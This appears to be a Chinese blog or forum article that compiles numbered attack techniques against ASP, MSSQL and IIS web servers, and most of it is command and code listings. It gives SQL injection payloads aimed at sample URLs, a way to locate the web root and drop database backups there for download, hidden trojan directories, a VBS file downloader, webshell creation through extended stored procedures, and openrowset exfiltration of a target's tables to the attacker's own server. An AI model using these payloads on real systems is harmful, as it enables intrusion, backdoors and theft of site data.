我要评论8)利用sql语句来查找web目录:根据经验,猜疑web根目录的顺序是:d盘、e盘、c盘,首先我们建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树,用以下语句:
;create table temp(dir nvarchar(255),depth varchar(255));--,该表的dir字段表示目录的名称,depth字段表示目录的深度。然后执行xp_dirtree获得d盘的目录树,语句如下:
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--
在进行下面的操作前,先查看d盘有几个文件夹,这样对d盘有个大致的了解,语句如下:
and (select count(*) from temp where depth=1 and dir not in('documents and settings','program files','recycler','system volume information','windows','caconfig','wmpub','microsoft uam 卷'))>=数字(数字=0、1、2、3...)
接着,我们在对方的网站上找几个一级子目录,如user、photo,然后,用筛选的方法来判断web根目录上是否存在此盘上,语句如下:
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)
看语句的返回结果,如果为真,表示web根目录有可能在此盘上,为了进一步确认,多测试几个子目录:
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)
...
如果所有的测试结果都为真,表示web根目录很有可能在此盘上。
下面假设找到的web根目录在此盘上,用以下的语句来获得一级子目录的深度:
and (select depth from temp where dir='user')>=数字(数字=1、2、3...)
假设得到的depth是3,说明user目录是d盘的3级目录,则web根目录是d盘的二级目录。
目前我们已经知道了根目录所在的盘符和深度,要找到根目录的具体位置,我们来从d盘根目录开始逐一搜寻,当然,没有必要知道每个目录的名称,否则太耗费时间了。
接下来,另外建立一个临时表,用来存放d盘的1级子目录下的所有目录,语句如下:
;create table temp1(dir nvarchar(255),depth varchar(255));--
然后把从d盘的第一个子目录下的所有目录存到temp1中,语句如下:
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('documents and settings','program files','recycler','system volume information','windows','caconfig','wmpub','microsoft uam 卷') order by dir desc)t order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
当然也可以把d盘的第二个子目录下的所有目录存到temp1中,只需把第二个top 1改为top 2就行了。
现在,temp1中已经保存了所有d盘第一级子目录下的所有目录,然后,我们用同样的方法来判断根目录是否在此一级子目录下:
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
如果返回为真,表示根目录可能在此子目录下,记住要多测试几个例子,如果都返回为假,则表明web根目录不在此目录下,然后我们在用同样的方法来获得d盘第2、3...个子目录下的所有目录列表,来判断web根目录是否在其下。但是,要注意,用xp_dirtree前一定要把temp1表中的内容删除。
现在假设,web根目录在d盘的第一级子目录下,该子目录名称为website,怎样获得这个目录的名称我想不用我说了吧。因为前面我们知道了web根目录的深度为2,我们需要知道website下到底哪个才是真正的web根目录。
现在,我们用同样的方法,再建立第3个临时表:
;create table temp2(dir nvarchar(255),depth varchar(255));--
然后把从d盘的website下的所有目录存到temp2中,语句如下:
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('documents and settings','program files','recycler','system volume information','windows','caconfig','wmpub','microsoft uam 卷') order by dir desc)t order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
当然也可以把d盘的website下第二个子目录下的所有目录存到temp2中,只需把第二个top 1改为top 2就行了。
现在,我们用同样的方法判断该目录是否为根目录:
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
如果返回为真,为了确定我们的判断,多测试几个例子,方法上面都讲到了,如果多个例子都返回为真,那么就确定了该目录为web根目录。
用以上的方法基本上可以获得web根目录,现在我们假设web根目录是:d:\website\www
然后,我们就可以备份当前数据库到这个目录下用来下载。备份前我们把temp、temp1、temp2的内容清空,然后c、d、e盘的目录树分别存到temp、temp1、temp2中。
下载完数据库后要记得把三个临时表drop掉,现在我们在下载的数据库中可以找到所有的目录列表,包括后台管理的目录以及更多信息。
21、win2000下将web用户提升为系统用户权限,需要有管理员的权限才能执行:
c:\>cscript c:\inetpub\adminscripts\adsutil.vbs set /w3svc/inprocessisapiapps "c:\winnt\system32\idq.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "c:\winnt\system32\inetsrv\ssinc.dll" "c:\winnt\system32\msw3prt.dll" "c:\winnt\system32\inetsrv\asp.dll"
cscript c:\inetpub\adminscripts\adsutil.vbs set /w3svc/inprocessisapiapps "c:\windows\system32\idq.dll" "c:\windows\system32\inetsrv\httpext.dll" "c:\windows\system32\inetsrv\httpodbc.dll" "c:\windows\system32\inetsrv\ssinc.dll" "c:\windows\system32\msw3prt.dll" "c:\windows\system32\inetsrv\asp.dll"
查看是否成功:
c:\>cscript c:\inetpub\adminscripts\adsutil.vbs get w3svc/inprocessisapiapps
microsoft (r) windows script host version 5.6
版权所有(c) microsoft corporation 1996-2001。保留所有权利。
inprocessisapiapps : (list) (6 items)
"c:\winnt\system32\idq.dll"
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\httpodbc.dll"
"c:\winnt\system32\inetsrv\ssinc.dll"
"c:\winnt\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"
22、如何隐藏asp木马:
建立非标准目录:mkdir images..\
拷贝asp木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问asp木马:http://ip/images../news.asp?action=login
如何删除非标准目录:rmdir images..\ /s
23、去掉tenlnet的ntlm认证:
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—
24、用echo写入文件下载脚本iget.vbs:
(1)echo set x= createobject(^"microsoft.xmlhttp^"):x.open ^"get^",lcase(wscript.arguments(0)),0:x.send():set s = createobject(^"adodb.stream^"):s.mode = 3:s.type = 1:s.open():s.write(x.responsebody):s.savetofile lcase(wscript.arguments(1)),2 >c:\iget.vbs
(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp
25、手工建立iis隐藏目录的方法:
? 查看本地虚拟目录列表:cscript.exe c:\inetpub\adminscripts\adsutil.vbs enum w3svc/1/root
? 新建一个kiss目录:mkdir c:\asp\kiss
? 建立kiss虚拟目录:cscript.exe c:\inetpub\adminscripts\mkwebdir.vbs -c mycomputer -w "default web site" -v "kiss","c:\asp\kiss"
? 为kiss目录加执行和写权限:
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
? ?:cscript c:\inetpub\adminscripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
? 访问:http://127.0.0.1/kiss/test.asp
26、使用openrowset()连回本地做测试:
select a.*
from openrowset('sqloledb','127.0.0.1';'sa';'111111',
'select * from [dvbbs].[dbo].[dv_admin]') as a
select * from openrowset('sqloledb','127.0.0.1';'sa';'111111',
'select * from [dvbbs].[dbo].[dv_admin]')
27、获得主机名:
http://www.xxxx.com/fullstory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername
28、获得数据库用户名:
http://www.xxxx.com/fullstory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user
29、普通用户获得webshell的方法之二:
? 打包:
exec [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
解包,可以用于得到webshell:
? exec [master].[dbo].[xp_unpackcab] 'c:\test.rar','c:',1, 'n.asp'
? 读任意文件内容,要求有master的dbo权限:
exec [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'
30、sa 权限下已知web路径直接备份数据库到web路径下
http://www.xxxx.com/fullstory.asp?id=1;backuup database 数据库名 to disk='c:\inetpub\wwwroot\save.db' 则把得到的数据内容全部备份到web目录下,再用http把此文件下载(当然首选要知道web虚拟目录)。
? 遍历系统的目录结构,分析结果并发现web虚拟目录,先创建一个临时表:temp
http://www.xxxx.com/fullstory.asp?id=1;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
? 接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:
http://www.xxxx.com/fullstory.asp?id=1;insert temp exec master.dbo.xp_availablemedia;--
? 我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:
http://www.xxxx.com/fullstory.asp?id=1;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
? 我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:
http://www.xxxx.com/fullstory.asp?id=1;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 这样就可以成功的浏览到所有的目录(文件夹)列表
? 如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--
? 使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。如:bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp' 浏览temp就可以看到index.asp文件的内容了!通过分析各种asp文件,可以得到大量系统信息,web建设与管理信息,甚至可以得到sa帐号的连接密码。
31、一些sql中的扩展存储的总结:
xp_availablemedia 显示系统上可用的盘符'c:\' xp_availablemedia
xp_enumgroups 列出当前系统的使用群组及其说明 xp_enumgroups
xp_enumdsn 列出系统上已经设置好的odbc数据源名称 xp_enumdsn
xp_dirtree 显示某个目录下的子目录与文件架构 xp_dirtree 'c:\inetpub\wwwroot\'
xp_getfiledetails 获取某文件的相关属性 xp_getfiledetails 'c:\inetpub\wwwroot.asp'
dbp.xp_makecab 将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开 dbp.xp_makecab 'c:\lin.cab','evil',1,'c:\inetpub\mdb.asp'
xp_unpackcab 解压缩 xp_unpackcab 'c:\hackway.cab','c:\temp',1
xp_ntsec_enumdomains 列出服务器域名 xp_ntsec_enumdomains
xp_servicecontrol 停止或者启动某个服务 xp_servicecontrol 'stop','schedule'
xp_terminate_process 用pid来停止某个执行中的程序 xp_terminate_process 123
dbo.xp_subdirs 只列某个目录下的子目录 dbo.xp_subdirs 'c:\'
32、
use master
go
create proc sp_msforeachobject
@objecttype int=1,
@command1 nvarchar(2000),
@replacechar nchar(1) = n'?',
@command2 nvarchar(2000) = null,
@command3 nvarchar(2000) = null,
@whereand nvarchar(2000) = null,
@precommand nvarchar(2000) = null,
@postcommand nvarchar(2000) = null
as
/* this proc returns one or more rows for each table (optionally, matching @where), with each table defaulting to its
own result set */
/* @precommand and @postcommand may be used to force a single result set via a temp table. */
/* preprocessor won't replace within quotes so have to use str(). */
declare @mscat nvarchar(12)
select @mscat = ltrim(str(convert(int, 0x0002)))
if (@precommand is not null)
exec(@precommand)
/* defined @isobject for save object type */
declare @isobject varchar(256)
select @isobject= case @objecttype when 1 then 'isusertable'
when 2 then 'isview'
when 3 then 'istrigger'
when 4 then 'isprocedure'
when 5 then 'isdefault'
when 6 then 'isforeignkey'
when 7 then 'isscalarfunction'
when 8 then 'isinlinefunction'
when 9 then 'isprimarykey'
when 10 then 'isextendedproc'
when 11 then 'isreplproc'
when 12 then 'isrule'
end
/* create the select */
/* use @isobject variable isstead of isusertable string */
exec(n'declare hcforeach cursor global for select ''['' + replace(user_name(uid), n'']'', n'']]'') + '']'' + ''.'' + ''['' +
replace(object_name(id), n'']'', n'']]'') + '']'' from dbo.sysobjects o '
+ n' where objectproperty(o.id, n'''+@isobject+''') = 1 '+n' and o.category & ' + @mscat + n' = 0 '
+ @whereand)
declare @retval int
select @retval = @@error
if (@retval = 0)
exec @retval = sp_msforeach_worker @command1, @replacechar, @command2, @command3
if (@retval = 0 and @postcommand is not null)
exec(@postcommand)
return @retval
go
/*
1。获得所有的存储过程的脚本:
exec sp_msforeachobject @command1="sp_helptext '?' ",@objecttype=4
2。获得所有的视图的脚本:
exec sp_msforeachobject @command1="sp_helptext '?' ",@objecttype=2
exec sp_msforeachobject @command1="sp_changeobjectowner '?', 'dbo'",@objecttype=1
exec sp_msforeachobject @command1="sp_changeobjectowner '?', 'dbo'",@objecttype=2
exec sp_msforeachobject @command1="sp_changeobjectowner '?', 'dbo'",@objecttype=3
exec sp_msforeachobject @command1="sp_changeobjectowner '?', 'dbo'",@objecttype=4
*/
33、db_owner权限下的数据库备份方法
用openrowset吧。反连到自己的数据库机器,~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的sql数据库,在查询分析那里执行
insert into openrowset ('sqloledb','server=你数据库服务器的ip;uid=user;pwd=pass;database=dbname;','select * from 你建立的表) select * from 对方的表—
要是数据量太大的话就看看他数据库里有没有自动编号的字段.select * from 表名 where id>100
这样来弄吧
要是和web同台的话,直接将库bak到web目录下回来就ok啦。。。不过前提库不能太大,超过2g的话sql就超时了
如果是sa权限可以利用下面的两个asp程序来备份数据库:
sqlbackup1.asp
<html>
<head>
<title>sql server 数据库的备份与恢复</title>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
</head>
<body>
<form method="post" name=myform>
选择操作:<input type="radio" name="act" id="act_backup" value="backup"><label for=act_backup>备份</label>
<input type="radio" name="act" id="act_restore" value="restore"><label for=act_restore>恢复</label>
<br>数据库名:<input type="text" name="databasename" value="<%=request("databasename")%>">
<br>文件路径:<input type="text" name="bak_file" value="c:\1.exe">(备份或恢复的文件路径,备份成exe主要为了方便下载,活活..)<br>
<input type="submit" value="确定">
</form>
<%
dim sqlserver,sqlname,sqlpassword,sqllogintimeout,databasename,bak_file,act
sqlserver = "localhost" 'sql服务器
sqlname = "sa" '用户名
sqlpassword = "数据库密码" '密码
sqllogintimeout = 15 '登陆超时
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "input database name"
else
if act = "backup" then
set srv=server.createobject("sqldmo.sqlserver")
srv.logintimeout = sqllogintimeout
srv.connect sqlserver,sqlname, sqlpassword
set bak = server.createobject("sqldmo.backup")
bak.database=databasename
bak.devices=files
bak.files=bak_file
bak.sqlbackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
response.write "<font color=green>备份成功!</font>"
elseif act = "restore" then
'恢复时要在没有使用数据库时进行!
set srv=server.createobject("sqldmo.sqlserver")
srv.logintimeout = sqllogintimeout
srv.connect sqlserver,sqlname, sqlpassword
set rest=server.createobject("sqldmo.restore")
rest.action=0 ' full db restore
rest.database=databasename
rest.devices=files
rest.files=bak_file
rest.replacedatabase=true 'force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.sqlrestore srv
response.write "<font color=green>恢复成功!</font>"
else
response.write "<font color=red>没有选择操作</font>"
end if
end if
%>
</body>
</html>
sqlbackup2.asp
<%@language="vbscript" codepage="936"%>
<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312" />
<title>采飞扬asp备份mssql数据库程序 v1.0--qq:79998575</title>
</head>
<style>
body { font-size: 9pt; color: #000000; font-family: "courier new"; scrollbar-face-color:#e4e4f3; scrollbar-highlight-color:#ffffff; scrollbar-3dlight-color:#e4e4f3; scrollbar-darkshadow-color:#9c9cd3; scrollbar-shadow-color:#e4e4f3; scrollbar-arrow-color:#4444b3; scrollbar-track-color:#efefef;}table { font-size: 9pt; font-family: "courier new"; border-collapse: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: none; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.tr { font-family: "courier new"; font-size: 9pt; background-color: #e4e4f3; text-align: center;}.td { font-family: "courier new"; font-size: 9pt; background-color: #f9f9fd;}.warningcolor { font-family: "courier new"; font-size: 9pt; color: #ff0000;}input {
font-family: "courier new";
border-top-width: 1px;
border-left-width: 1px;
font-size: 12px;
border-bottom-width: 1px;
border-right-width: 1px;
color: #000000;
}textarea { font-family: "courier new"; border-top-width: 1px; border-left-width: 1px; font-size: 12px; border-bottom-width: 1px; border-right-width: 1px; color: #000000;}.liuyes {
background-color: #ccccff;
}
a:link { font-size: 9pt; color: #000000; font-family: "courier new"; text-decoration: none;}tr { font-family: "courier new"; font-size: 9pt; line-height: 18px;}td { font-family: "courier new"; font-size: 9pt; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: none; border-right-style: solid; border-bottom-style: solid; border-left-style: none; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}.trhead { font-family: "courier new"; font-size: 9pt; background-color: #e4e4f3; line-height: 3px;}.inputlogin { font-family: "courier new"; font-size: 9pt; border: 1px solid #d8d8f0; background-color: #f9f9fd; vertical-align: bottom;}</style>
<body>
<form method="post" name="myform" action="?action=backupdatabase">
<table width="686" border="1" align="center">
<tr>
<td width="613" height="30" align="center" bgcolor="#330066"><font color="#ffffff">采飞扬asp备份mssql数据库程序 v1.0 </font></td>
</tr>
<tr>
<td>选择操作:
<input type="radio" name="act" id="act_backup"value="backup" />
<label for=act_backup>备份</label>
<input type="radio" name="act" id="act_restore" value="restore" />
<label for=act_restore>恢复</label></td>
</tr>
<tr>
<td><label>sql服务器:
<input type="text" name="sqlserver" value="localhost" />
</label></td>
</tr>
<tr>
<td><label>用户名:
<input name="sqlname" type="text" value="sa" />
密 码:
<input type="text" name="sqlpassword" />
</label></td>
</tr>
<tr>
<td><label>数据库名:
<input type="text" name="databasename" value="<%=request("databasename")%>" />
</label></td>
</tr>
<tr>
<td>文件路径:
<input name="bak_file" type="text" value="<% =server.mappath("\")&"\"&"liuyes.bak"%>" size="60" />
(备份或恢复的文件路径)</td>
</tr>
<tr>
<td><% response.write "本文件绝对路径:" %>
<font color="#ff0000">
<% =server.mappath(request.servervariables("script_name")) %>
</font></td>
</tr>
<tr>
<td><input name=submit1 type="submit" class="liuyes" id=submit1 size="10" value="确 定" />
<input name="submit" type="reset" class="liuyes" size="10" value="重 置" /></td>
</tr>
</table>
</form>
<table width="686" border="1" align="center">
<tr>
<td>提示信息:<%
if request("action")="" then
response.write "<font color=#ff0000>不用我多说什么了吧!</font>"
end if
'sql server 数据库的备份与恢复!
if request("action")="backupdatabase" then
dim sqlserver,sqlname,sqlpassword,sqllogintimeout,databasename,bak_file,act
sqlserver = trim(request("sqlserver"))
sqlname = trim(request("sqlname"))
sqlpassword =trim(request("sqlpassword"))
sqllogintimeout = 15
databasename = trim(request("databasename"))
bak_file = trim(request("bak_file"))
bak_file = replace(bak_file,"$1",databasename)
act = lcase(request("act"))
if databasename = "" then
response.write "<font color=#ff0000>没有输入数据库名称!</font>"
else
if act = "backup" then
set srv=server.createobject("sqldmo.sqlserver")
srv.logintimeout = sqllogintimeout
srv.connect sqlserver,sqlname, sqlpassword
set bak = server.createobject("sqldmo.backup")
bak.database=databasename
bak.devices=files
bak.action = 0
bak.initialize = 1
'bak.replace = true
bak.files=bak_file
bak.sqlbackup srv
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
response.write "<font color=green>备份成功!</font>"
elseif act="restore" then
'恢复时要在没有使用数据库时进行!
set srv=server.createobject("sqldmo.sqlserver")
srv.logintimeout = sqllogintimeout
srv.connect sqlserver,sqlname, sqlpassword
set rest=server.createobject("sqldmo.restore")
rest.action=0 ' full db restore
rest.database=databasename
rest.devices=files
rest.files=bak_file
rest.replacedatabase=true 'force restore over existing database
if err.number>0 then
response.write err.number&"<font color=red><br>"
response.write err.description&"</font>"
end if
rest.sqlrestore srv
response.write "<font color=green>恢复成功!</font>"
else
response.write "<font color=red>请选择备份或恢复!</font>"
end if
end if
end if
%></td>
</tr>
</table>
</body>
</html>
发表评论